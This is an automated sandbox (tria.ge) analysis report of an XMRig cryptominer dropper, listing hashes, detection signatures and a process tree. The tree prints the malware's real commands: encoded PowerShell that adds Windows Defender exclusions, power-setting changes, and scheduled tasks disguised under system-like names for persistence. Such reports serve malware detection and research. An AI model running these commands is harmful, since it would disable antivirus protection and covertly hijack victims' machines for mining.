Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
300s -
max time network
181s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
16/04/2023, 04:47
Static task
static1
Behavioral task
behavioral1
Sample
0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe
Resource
win7-20230220-en
General
-
Target
0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe
-
Size
301KB
-
MD5
b1f5b6125991825cfb4a06104499b3ed
-
SHA1
c46a5fbbf1f9262fe4d7f08d507ec41de96fc9ae
-
SHA256
0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1
-
SHA512
798d1318a82bfaf24f42aaf4fee87c7d148bf9210bb5a889304026b9723520f9972073dbd37ee61f90293e5bba7576911f9a5ef9b5685d56e0ce5fbfc394029c
-
SSDEEP
6144:ZgKilj8OGsaOzcDLwjaGUxYM8wS3Y3avn4udWglY:ZFit8OGt6cP2ajZPK4ud
Malware Config
Signatures
-
XMRig Miner payload 16 IoCs
resource yara_rule behavioral2/files/0x000600000001af63-1705.dat family_xmrig behavioral2/files/0x000600000001af63-1705.dat xmrig behavioral2/files/0x000600000001af63-1707.dat family_xmrig behavioral2/files/0x000600000001af63-1707.dat xmrig behavioral2/memory/4108-1709-0x0000000000400000-0x0000000000EFC000-memory.dmp xmrig behavioral2/files/0x000600000001af63-1711.dat family_xmrig behavioral2/files/0x000600000001af63-1711.dat xmrig behavioral2/memory/2956-1713-0x0000000000400000-0x0000000000EFC000-memory.dmp xmrig behavioral2/files/0x000600000001af63-1714.dat family_xmrig behavioral2/files/0x000600000001af63-1714.dat xmrig behavioral2/files/0x000600000001af63-1715.dat family_xmrig behavioral2/files/0x000600000001af63-1715.dat xmrig behavioral2/memory/5040-1717-0x0000000000400000-0x0000000000EFC000-memory.dmp xmrig behavioral2/files/0x000600000001af63-1719.dat family_xmrig behavioral2/files/0x000600000001af63-1719.dat xmrig behavioral2/memory/2216-1721-0x0000000000400000-0x0000000000EFC000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts AppLaunch.exe -
Executes dropped EXE 7 IoCs
pid Process 2188 dllhost.exe 4572 winlogson.exe 4108 winlogson.exe 2956 winlogson.exe 5040 winlogson.exe 2216 winlogson.exe 4368 dllhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4192 set thread context of 3564 4192 0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe 67 -
Program crash 1 IoCs
pid pid_target Process procid_target 3244 4192 WerFault.exe 65 -
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2832 schtasks.exe 2940 schtasks.exe 4728 schtasks.exe 3012 schtasks.exe 2108 schtasks.exe 4488 schtasks.exe 4420 schtasks.exe 4004 schtasks.exe 3972 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3564 AppLaunch.exe 4132 powershell.exe 4132 powershell.exe 4132 powershell.exe 3732 powershell.exe 3732 powershell.exe 1844 powershell.exe 1844 powershell.exe 3292 powershell.exe 3292 powershell.exe 4480 powershell.exe 4480 powershell.exe 4544 powershell.exe 4544 powershell.exe 3732 powershell.exe 1844 powershell.exe 4544 powershell.exe 4480 powershell.exe 3292 powershell.exe 3732 powershell.exe 1844 powershell.exe 4544 powershell.exe 3292 powershell.exe 4480 powershell.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe 2188 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 3564 AppLaunch.exe Token: SeDebugPrivilege 4132 powershell.exe Token: SeShutdownPrivilege 3980 powercfg.exe Token: SeCreatePagefilePrivilege 3980 powercfg.exe Token: SeShutdownPrivilege 4512 powercfg.exe Token: SeCreatePagefilePrivilege 4512 powercfg.exe Token: SeDebugPrivilege 3732 powershell.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeShutdownPrivilege 4368 powercfg.exe Token: SeCreatePagefilePrivilege 4368 powercfg.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 3292 powershell.exe Token: SeDebugPrivilege 4544 powershell.exe Token: SeShutdownPrivilege 3740 powercfg.exe Token: SeCreatePagefilePrivilege 3740 powercfg.exe Token: SeShutdownPrivilege 3704 powercfg.exe Token: SeCreatePagefilePrivilege 3704 powercfg.exe Token: SeShutdownPrivilege 3704 powercfg.exe Token: SeCreatePagefilePrivilege 3704 powercfg.exe Token: SeDebugPrivilege 2188 dllhost.exe Token: SeDebugPrivilege 4368 dllhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4192 wrote to memory of 3564 4192 0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe 67 PID 4192 wrote to memory of 3564 4192 0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe 67 PID 4192 wrote to memory of 3564 4192 0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe 67 PID 4192 wrote to memory of 3564 4192 0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe 67 PID 4192 wrote to memory of 3564 4192 0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe 67 PID 3564 wrote to memory of 3296 3564 AppLaunch.exe 71 PID 3564 wrote to memory of 3296 3564 AppLaunch.exe 71 PID 3564 wrote to memory of 3296 3564 AppLaunch.exe 71 PID 3296 wrote to memory of 4132 3296 cmd.exe 73 PID 3296 wrote to memory of 4132 3296 cmd.exe 73 PID 3296 wrote to memory of 4132 3296 cmd.exe 73 PID 3564 wrote to memory of 2188 3564 AppLaunch.exe 74 PID 3564 wrote to memory of 2188 3564 AppLaunch.exe 74 PID 3564 wrote to memory of 2188 3564 AppLaunch.exe 74 PID 3564 wrote to memory of 2148 3564 AppLaunch.exe 97 PID 3564 wrote to memory of 2148 3564 AppLaunch.exe 97 PID 3564 wrote to memory of 2148 3564 AppLaunch.exe 97 PID 3564 wrote to memory of 676 3564 AppLaunch.exe 96 PID 3564 wrote to memory of 676 3564 AppLaunch.exe 96 PID 3564 wrote to memory of 676 3564 AppLaunch.exe 96 PID 3564 wrote to memory of 5028 3564 AppLaunch.exe 95 PID 3564 wrote to memory of 5028 3564 AppLaunch.exe 95 PID 3564 wrote to memory of 5028 3564 AppLaunch.exe 95 PID 3564 wrote to memory of 5044 3564 AppLaunch.exe 94 PID 3564 wrote to memory of 5044 3564 AppLaunch.exe 94 PID 3564 wrote to memory of 5044 3564 AppLaunch.exe 94 PID 3564 wrote to memory of 1648 3564 AppLaunch.exe 93 PID 3564 wrote to memory of 1648 3564 AppLaunch.exe 93 PID 3564 wrote to memory of 1648 3564 AppLaunch.exe 93 PID 3564 wrote to memory of 1896 3564 AppLaunch.exe 92 PID 3564 wrote to memory of 1896 3564 AppLaunch.exe 92 PID 3564 wrote to memory of 1896 3564 AppLaunch.exe 92 PID 3564 wrote to memory of 2304 3564 AppLaunch.exe 91 PID 3564 wrote to memory of 2304 3564 AppLaunch.exe 91 PID 3564 wrote to memory of 2304 3564 AppLaunch.exe 91 PID 3564 wrote to memory of 5068 3564 AppLaunch.exe 85 PID 3564 wrote to memory of 5068 3564 AppLaunch.exe 85 PID 3564 wrote to memory of 5068 3564 AppLaunch.exe 85 PID 3564 wrote to memory of 2220 3564 AppLaunch.exe 84 PID 3564 wrote to memory of 2220 3564 AppLaunch.exe 84 PID 3564 wrote to memory of 2220 3564 AppLaunch.exe 84 PID 3564 wrote to memory of 932 3564 AppLaunch.exe 83 PID 3564 wrote to memory of 932 3564 AppLaunch.exe 83 PID 3564 wrote to memory of 932 3564 AppLaunch.exe 83 PID 3564 wrote to memory of 892 3564 AppLaunch.exe 82 PID 3564 wrote to memory of 892 3564 AppLaunch.exe 82 PID 3564 wrote to memory of 892 3564 AppLaunch.exe 82 PID 3564 wrote to memory of 888 3564 AppLaunch.exe 81 PID 3564 wrote to memory of 888 3564 AppLaunch.exe 81 PID 3564 wrote to memory of 888 3564 AppLaunch.exe 81 PID 3564 wrote to memory of 672 3564 AppLaunch.exe 80 PID 3564 wrote to memory of 672 3564 AppLaunch.exe 80 PID 3564 wrote to memory of 672 3564 AppLaunch.exe 80 PID 3564 wrote to memory of 2264 3564 AppLaunch.exe 75 PID 3564 wrote to memory of 2264 3564 AppLaunch.exe 75 PID 3564 wrote to memory of 2264 3564 AppLaunch.exe 75 PID 2264 wrote to memory of 3980 2264 cmd.exe 103 PID 2264 wrote to memory of 3980 2264 cmd.exe 103 PID 2264 wrote to memory of 3980 2264 cmd.exe 103 PID 2220 wrote to memory of 1844 2220 cmd.exe 104 PID 2220 wrote to memory of 1844 2220 cmd.exe 104 PID 2220 wrote to memory of 1844 2220 cmd.exe 104 PID 892 wrote to memory of 3732 892 cmd.exe 105 PID 892 wrote to memory of 3732 892 cmd.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe"C:\Users\Admin\AppData\Local\Temp\0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAGEAcgBrAE8AbgBpAGgAQQBTACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgBDAGoAdgBDAFoAbwB5ADEAcwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAzAGEAZABtAHoAMwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA2AGkAYQBMADEAdgBhAGUATwAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGEAcgBrAE8AbgBpAGgAQQBTACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgBDAGoAdgBDAFoAbwB5ADEAcwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAzAGEAZABtAHoAMwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA2AGkAYQBMADEAdgBhAGUATwAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
-
C:\ProgramData\Dllhost\dllhost.exe"C:\ProgramData\Dllhost\dllhost.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json4⤵PID:624
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json4⤵PID:3872
-
C:\Windows\SysWOW64\chcp.comchcp 12515⤵PID:4424
-
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
- Executes dropped EXE
PID:4572
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json4⤵PID:4680
-
C:\Windows\SysWOW64\chcp.comchcp 12515⤵PID:4776
-
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
- Executes dropped EXE
PID:4108
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json4⤵PID:4932
-
C:\Windows\SysWOW64\chcp.comchcp 12515⤵PID:404
-
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
- Executes dropped EXE
PID:2956
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json4⤵PID:2400
-
C:\Windows\SysWOW64\chcp.comchcp 12515⤵PID:4540
-
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
- Executes dropped EXE
PID:5040
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json4⤵PID:4300
-
C:\Windows\SysWOW64\chcp.comchcp 12515⤵PID:3428
-
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
- Executes dropped EXE
PID:2216
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo рннЕЮпМAшЪo5ВoX & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo3⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3980
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /hibernate off4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3704
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f4⤵
- Creates scheduled task(s)
PID:3012
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjABkELgQ2BEgEHgQ0AEkEUgA5AGkAEAQ3BGkAagAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOQBZADoENABsAHUARwRiADYESwA0BEIEKwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbAAxAE0AOgROBDUAQgRsAEIESgQnBHQARwQlBEIAIwA+ACAAQAAoACAAPAAjAGsAEARCAEwEYgA+BHMAZwAaBEQETgA0BCAESwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJAQ5AEgEIgQ0AEgASARRADIAMQRYAE8ELwQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMALwQ3ACsEHQQaBEEAFQRGBHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANABKAEYATgRzAHIAaQB6AG8AHQRtAE0EcgArBCMAPgA="3⤵PID:672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjABkELgQ2BEgEHgQ0AEkEUgA5AGkAEAQ3BGkAagAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOQBZADoENABsAHUARwRiADYESwA0BEIEKwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbAAxAE0AOgROBDUAQgRsAEIESgQnBHQARwQlBEIAIwA+ACAAQAAoACAAPAAjAGsAEARCAEwEYgA+BHMAZwAaBEQETgA0BCAESwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJAQ5AEgEIgQ0AEgASARRADIAMQRYAE8ELwQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMALwQ3ACsEHQQaBEEAFQRGBHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANABKAEYATgRzAHIAaQB6AG8AHQRtAE0EcgArBCMAPgA="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAGoAHgQfBG0AbQBnACoEMgRDBDQAYgA/BGYAQQA1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABKBCMETQRRAGYAVwBWACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB6ABwEVgA1ADcEUgAlBHEAYQBIBBwERARRAEoEIwA+ACAAQAAoACAAPAAjAHAANABLBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlADIAcQBsACkEVwA5ADUAVwA7BDIEZQBGBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwB3ABsEbAA1AHQAIQRuAHcAOQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA2BEYEIwA+AA=="3⤵PID:888
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGoAHgQfBG0AbQBnACoEMgRDBDQAYgA/BGYAQQA1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABKBCMETQRRAGYAVwBWACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB6ABwEVgA1ADcEUgAlBHEAYQBIBBwERARRAEoEIwA+ACAAQAAoACAAPAAjAHAANABLBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlADIAcQBsACkEVwA5ADUAVwA7BDIEZQBGBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwB3ABsEbAA1AHQAIQRuAHcAOQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA2BEYEIwA+AA=="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3292
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAFkAIwQ6BHQANQAzABwEIwRuAGQAcgB3AHMARQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4ATQBnACEEUQBEAEgETABrADgATQA4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA0BCoEEQRqAC4EJARNAC8ENQRIABQEQARXAHQAIwA+ACAAQAAoACAAPAAjADAALARWAEcAOwRNAHMAVwAsBDQAHAQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJAQ3ADMATwRzABwEZwBuAEkAZgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAdwBMACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjACsESgRlAHMATwAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAFkAIwQ6BHQANQAzABwEIwRuAGQAcgB3AHMARQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4ATQBnACEEUQBEAEgETABrADgATQA4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA0BCoEEQRqAC4EJARNAC8ENQRIABQEQARXAHQAIwA+ACAAQAAoACAAPAAjADAALARWAEcAOwRNAHMAVwAsBDQAHAQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJAQ3ADMATwRzABwEZwBuAEkAZgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAdwBMACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjACsESgRlAHMATwAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAFoAMAA1ADEAIgRjADgEQwRCBHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBzABwETQRABCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAyBDYAIwA+ACAAQAAoACAAPAAjAEoAOQB0AEwEMQBjAE8EdABOABkEegBkADgEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAC4EFAQ6BGMANwBLADgEPAQ8BGYAMQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAagBSABYEIwQ0AG8ASAQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBDAGsARgBHBGUAWQBLACMAPgA="3⤵PID:932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAFoAMAA1ADEAIgRjADgEQwRCBHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBzABwETQRABCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAyBDYAIwA+ACAAQAAoACAAPAAjAEoAOQB0AEwEMQBjAE8EdABOABkEegBkADgEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAC4EFAQ6BGMANwBLADgEPAQ8BGYAMQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAagBSABYEIwQ0AG8ASAQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBDAGsARgBHBGUAWQBLACMAPgA="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjADEEJQR6AEkAUAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADAANgQcBCYEMAAmBDQERAByAFMANQQsBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA1BEMEQgRFBEEEPAQtBFIAGAQjAD4AIABAACgAIAA8ACMALAROBDgERgAvBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAYBEEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAE4AJwQ3ABsERwBMBDAAQgAjBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAD0EQgBNAEQEWABGBEwEYwBGAEYEIwA+AA=="3⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjADEEJQR6AEkAUAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADAANgQcBCYEMAAmBDQERAByAFMANQQsBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA1BEMEQgRFBEEEPAQtBFIAGAQjAD4AIABAACgAIAA8ACMALAROBDgERgAvBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAYBEEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAE4AJwQ3ABsERwBMBDAAQgAjBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAD0EQgBNAEQEWABGBEwEYwBGAEYEIwA+AA=="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo эIvННZ & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo омОщA9ЪТ1ЫэхХхИd3⤵PID:5068
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f4⤵
- Creates scheduled task(s)
PID:4004
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo УjleЗcЭУU & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo I1iЯhеяRyоЩШ3⤵PID:2304
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f4⤵
- Creates scheduled task(s)
PID:4728
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo NжМeТщЭaEПыQyzE & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo MжРбМэМh3⤵PID:1896
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f4⤵
- Creates scheduled task(s)
PID:2940
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo 7вДvЧ & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo VmЛп5чфiEsaкДт74яr3⤵PID:1648
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f4⤵
- Creates scheduled task(s)
PID:4488
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo AETrwХZ & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo цxоHdLпУфaЙ3⤵PID:5044
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f4⤵
- Creates scheduled task(s)
PID:2108
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo 2хсGдб & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЭЦн3⤵PID:5028
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f4⤵
- Creates scheduled task(s)
PID:2832
-
-
-
